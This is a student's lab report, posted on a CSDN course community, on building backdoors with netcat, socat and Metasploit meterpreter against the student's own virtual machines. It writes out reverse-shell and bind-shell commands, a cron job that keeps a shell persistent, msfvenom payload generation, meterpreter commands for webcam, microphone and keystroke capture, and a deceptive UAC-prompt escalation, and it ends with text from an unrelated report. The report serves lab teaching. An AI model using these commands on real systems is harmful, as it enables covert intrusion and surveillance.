20212326 2123-2124-2 《网络与系统攻防技术》实验二实验报告

20212326李齐琨 2024-04-02 20:40:52

1.实验内容

后门概念

后门,即指绕过正常的认证流程和安全控制,直接访问系统或程序的通道。它允许攻击者获取对系统或程序的未授权访问。后门可以存在于多种环境中,如应用程序、操作系统、编译器等,其中应用程序中的后门尤为常见。

常用后门工具

Netcat:
功能:进行基本的TCP、UDP数据收发工作,常用于扫描。
特点:与其他工具结合可开发出多种网络攻击手段,被誉为网络攻击中的“瑞士军刀”。
应用:可用来创建后门。
Socat:
功能:在两个数据流之间建立通道,支持多种协议和链接方式。
特点:作为Netcat的加强版,提供了更多的功能和灵活性。
应用:同样可用来获取主机操作Shell。
Meterpreter:
功能:用于生成后门程序的工具。
特点:包含后门的基本和扩展功能,可按需组合形成所需的可执行文件。
应用:生成后门文件,进行远程控制和数据窃取。

具体内容

使用Netcat获取Shell并设置cron任务:
通过Netcat建立与主机的连接,获取主机的操作Shell。
利用cron(Linux下的任务调度工具)设置定时任务,执行自定义的操作。
使用Socat获取Shell及任务计划启动:
借助Socat的功能,建立与主机的数据流通道,获取操作Shell。
利用任务计划(如Windows的任务计划程序)来启动和执行特定的任务。
使用Meterpreter生成并执行后门:
利用Meterpreter工具生成可执行的后门文件。
通过ncat或socat将后门文件传送到目标主机并执行,从而获取主机的Shell。
使用Meterpreter进行数据窃取和提权:
利用Meterpreter的后门功能,获取目标主机的音频、摄像头数据、击键记录等敏感信息。
尝试进行提权操作,以获取更高的系统权限。
使用MSF生成Shellcode并注入:
利用Metasploit Framework(MSF)生成Shellcode。
将生成的Shellcode注入到实践中的pwn1程序中,实现反弹连接Shell的功能,即目标主机主动连接攻击者的机器,从而获取Shell。

2.实验过程

2.1 准备工作

2.1.1分别确定主机和虚拟机的ip地址

主机IP地址:192.168.1.109

img

kali的ip地址:192.168.71.137

img

2.1.2 下载所需文件

Linux系统自带natcat和socat,但是Windows主机没有natcat没有socat,因此在实验开始之前,先根据老师所提供的实验链https://img-community.csdnimg.cn/images/532b8e1ae3a94be9a8b28182e6016dea.png "#left")
接,下载socat的相关安装包并安装解压到本机电脑上

img

2.2 使用netcat获取主机操作

2.2.1 在Windows中获取Linux操作

在Windows主机中使用ncat.exe -l -p 2311监听本机的2311端口

在虚拟机中使用命令行nc 192.168.56.1 2311 -e /bin/sh,采用反弹式连接,连接到Windows主机上。(192.168.56.1为Windows本机ip)

img

此时处于监听状态的Windows主机成功获取到了Linux虚拟机的Shell,可以输入命令行查看相关的信息

img

2.2.2 在Linux中获取Windows操作

在kali虚拟机中使用nc -l -p 2311监听虚拟机的2311端口
在Windows主机中使用命令行ncat.exe -e cmd 192.168.159.143 2311反弹式连接到kali虚拟机上
成功获取到了kali的Shell

img

2.2.3 获取Linux虚拟机操作,cron启动

在虚拟机上用命令号crontab -e编辑一条定时任务

crontab命令
crontab命令常见于Unix和类Unix的操作系统之中,用于设置周期性被执行的指令。通过crontab命令,我们可以在固定的间隔时间执行指定的系统指令或shellscript脚本。时间间隔的单位可以是分钟、小时、日、月、周及以上的任意组合。
用户所建立的crontab文件中,每一行都代表一项任务,每行的每个字段代表一项设置,它的格式共分为六个字段,前五段是时间设定段,第六段是要执行的命令段。
打开后,输入* * * * * /bin/netcat 192.168.1.109 2326 -e /bin/sh

img

在Windows本机端口使用命令行ncat.exe -l -p 2326打开2326端口进行监听,成功获取虚拟机的Shell

img

2.3 使用socat获取Windows主机操作,任务计划启动

在Windows主机中按Win+R,再输入compmgmt.msc打开计算机管理器
在系统工具中的任务计划程序中创建任务,命名为20212326lqk

img

img

新建触发器,设置为在工作站锁定时触发启动,并设置任务状态为启动。新建操作为启动程序,添加socat程序的路径(socat.exe),并添加参数:tcp-listen:2311 exec:cmd.exe,pty,stderr,把cmd.exe绑定到端口2311

img

启动任务:

img

在kali中输入socat -tcp:192.168.56.1 2311,连接到Windows主机,成功获取Windows的Shell

img

2.4 使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

在Windos使用命令行ncat.exe -lv 2326 >20212326_backdoor.exe,打开2326端口监听,等待接收可执行文件20212326_backdoor.exe

img

在kali上用命令行nc 192.168.56.1 2311 < 20212311_backdoor.exe,将生成的可执行文件20212311_backdoor.exe传送给Windows主机

img

在kali上使用msfconsole进入msf控制台
通过以下指令配置监听模块:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.71.137
set LPORT 2326

img

配置完成后,输入exploit进行监听。在Windows上打开20212311_backdoor.exe文件,kali虚拟机Linux端成功获取Shell

2.5 使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

这部分实验都是在前一部分的基础上完成的

2.5.1 获取麦克风音频

record_mic

2.5.2 获取摄像头图片

webcam_snap

2.5.3 获取击键记录

开始获取:keyscan_start
结束获取:keyscan_dump
2.5.4 获取主机屏幕图像
screenshot

img

2.6.使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell

使用msf生成指定需要的shellcode
在root权限的kali终端输入以下:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.71.137 LPORT=2326 -x pwn1 -f elf > 20212326_pwn1
chmod +x 20212326_pwn1
sudo ./20212326_pwn

img

在另一个终端配置监听模块

use exploit/multi/handler
set payload linux/x86/meterpreter/reverse tcp
set LHOST 192.168.71.137
set LPORT 2326

img

3.问题及解决方案

问题一:

img

解决方案:关闭所有防火墙

img

问题二:提权失败,无法以普通用户身份进行提权操作。

解决方案:要以管理员身份打开后门(可执行文件)后,有了充足权限才可进行提权操作
输入命令use exploit/windows/local/ask, 模拟一个UAC确认窗口
输入命令set FILENAME 20212402.exe,设置其中显示的应用程序的名字(最好是具有欺骗性的名字,这里以我的学号为例)
输入命令set SESSION 1
输入命令 set PATH D:\test
输入命令set LHOST 192.168.43.221
输入命令set LPORT 2482
输入命令run ,运行
输入命令getsystem 尝试提权
主机显示下方UAC确认窗口,提权成功

4.实验心得与体会

通过这次实践,我深入了解了后门原理及其相关技术,包括使用netcat、socat以及MSF meterpreter等工具进行后门植入、任务启动和数据收集。在实践过程中,我首先尝试了使用netcat获取主机操作Shell,并通过cron启动了一项自定义任务。这个过程让我理解了cron在Linux系统中的重要作用,以及如何利用它来周期性地执行特定任务。接着,我利用socat获取了主机操作Shell,并通过任务计划启动了另一个任务。通过对比netcat和socat的使用,我更加熟悉了这两个工具的特性和用法。在MSF meterpreter部分,我生成了可执行文件,并利用ncat或socat将其传送到主机并运行,成功获取了主机Shell。这一步骤让我深刻体会到了MSF meterpreter的强大功能,它能够执行各种复杂的操作,如文件上传下载、执行命令、获取系统信息等。此外,我还尝试使用MSF meterpreter获取了目标主机的音频、摄像头和击键记录等内容,并尝试进行提权操作。这些操作让我对MSF meterpreter的功能有了更加全面的了解。
通过这次实践,我对后门原理及免杀技术有了更加深入的了解。我认识到,后门往往是通过各种漏洞和弱点植入到系统中的,因此我们需要时刻保持警惕,加强系统的安全防护。同时,我也学会了如何检查系统是否被安装了后门,例如通过检查进程、网络连接和文件系统等。

...全文
40 回复 打赏 收藏 转发到动态 举报
写回复
用AI写文章
回复
切换为时间正序
请发表友善的回复…
发表回复
网络信息安全综合实验 任 务 书 一、 目的与要求 根据实验内容的要求和实验安排,要求学生在掌握网络信息安全基本知识的基础上, 能够设计出相应的软件,并且熟练地运用各种网络信息安全技术和手段,发现并解决各 类安全问题,维护网络及操作系统的安全。 、 主要内容 实验一加密认证通信系统实现 设计实现一个通信系统,双方可以通过消息和文件通信,用户可选择一种加密算法和 认证算法,对消息和文件进行加密通信和完整性验证。(要实现认证和加密,工具和语 言不限,可以直接调用现有模块,认证和加密不限) 实验 综合扫描及安全评估 利用常见的一些扫描工具可以检测本系统及其它系统是否存在漏洞等安全隐患,给出 全面而完善的评估报告,帮助管理员发现存在的问题,进而采取有力措施予以弥补,从 而提高系统的安全性能。 实验网络攻防技术 矛与盾的关系告诉我们,在研究网络安全技术时,只着眼于安全防范技术是远远不够 的,知己知彼方能百战不殆,因此,很有必要同时研究攻击与防范技术,才能更有效地 解决各种威胁。 实验四 Windows系统安全配置方案 作为网络节点,操作系统安全成为网络信息安全首先应予考虑的事务,然而人们往往 忽视了OS的安全性。其实,OS的安全不只体现在密码口令上,这仅仅是最基本的一个方 面。除此之外,服务、端口、共享资源以及各种应用都很有可能存在着安全隐患,因此 ,应采取相应措施设置完善的本地安全策略,并使用防病毒软件、防火墙软件甚至入侵 检测软件来加强系统的安全。 其中实验一要求编程实现,可直接调用相关功能函数完成。实验实验四可在机房 的网络信息安全综合实验系统上完成。 三、 进度计划 "序号 "设计(实验)内容 "完成时间 "备注 " "1 "接受任务,查阅文献,开始实 "第一天 " " " "现密码算法和认证算法 " " " "2 "完成加密认证通信系统 "第至七天 " " "3 "上午完成综合扫描及安全评估 "第八天 " " " "实验,下午进行网络攻防实验 " " " "4 "上午完成网络攻防实验,下午 "第九天 " " " "进行系统安全配置实验 " " " "5 "撰写实验报告并验收 "第十天 " " 四、 实验成果要求 1. 要求程序能正常运行,并实现任务书要求功能。 2. 完成实验报告,要求格式规范,内容具体而翔实,应体现自身所作的工作,注重 对设计思路的归纳和对问题解决过程的总结。 五、 考核方式 平时成绩+程序验收+实验报告。 学生姓名: 指导教师: 2016 年 6 月 13 日 实验报告 题 目: 网络信息安全综合实验 院 系:计算机系 班 级: 学 号: 学生姓名: 指导教师: 成 绩: 实验日期:2021 年 6 月 一、 目的与要求 根据实验内容的要求和实验安排,要求学生在掌握网络信息安全基本知识的基础上, 能够设计出相应的软件,并且熟练地运用各种网络信息安全技术和手段,发现并解决各 类安全问题,维护网络及操作系统的安全。 实验内容 设计实现一个通信系统,双方可以通过消息和文件通信,用户可选择一种加密算法和 认证算法,对消息和文件进行加密通信和完整性验证。(要实现认证和加密,工具和语 言不限,可以直接调用现有模块,认证和加密不限) 三、实验结果 实验一:本通信系统为用C#语言编写的P2P方式通信的系统,其具体功能如下: 1、识别本机IP地址并赋值到文本框中,产生一个随机数作为端口号,端口号范围限制在 1000到65535之间。 2、通过运用网络编程的知识尝试用产生的IP与端口号进行监听。 图1 发送方界面 图2 接收方界面 3、设置刷新区域,定时刷新好友在线,可以设置刷新间隔,启动和停止刷新。这里 可以通过拖拽VS里自带的控件"timersecond",实现计时。 4、发送消息。消息的传送是具有加密与认证的。 加密:考虑到DES的安全性问题,加密消息是采用AES方式加密的,本系统采用的是 C#封装好的AES程序,调用接口,实现对明文的加密。解密同理。 认证:认证是将明文哈希散列后采用RSA算法对其进行签名,再用公钥加密进行认证 的,其中哈希散列采用的是SHA1方式。下图为加密与认证的具体流程。 图3 加密与认证流程 图4 发送方可显示明文与密文 图5接收方解密出明文 5、可以发送文件。通过获取文本框中的文件地址,建立文件流,向接收端发送文件 。 接收端进行文件监听,接收文件,与发送文件编写过程相似,只是把"写"换成了"读"文 件。VS里自带的控件"saveFileDialog"可以帮助用户提示选择保存文件的位置。 图6 输入文件位置 图7 询问是否接受文件 图8 接收与发送文件成功 实验:认识性实验实验为认识练习信息安全实验平台的部分实验。 SuperScan端口扫描实验 扫描结果如下图: 图

92

社区成员

发帖
与我相关
我的任务
社区描述
网络攻防作业
网络安全 高校
社区管理员
  • blackwall0321
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧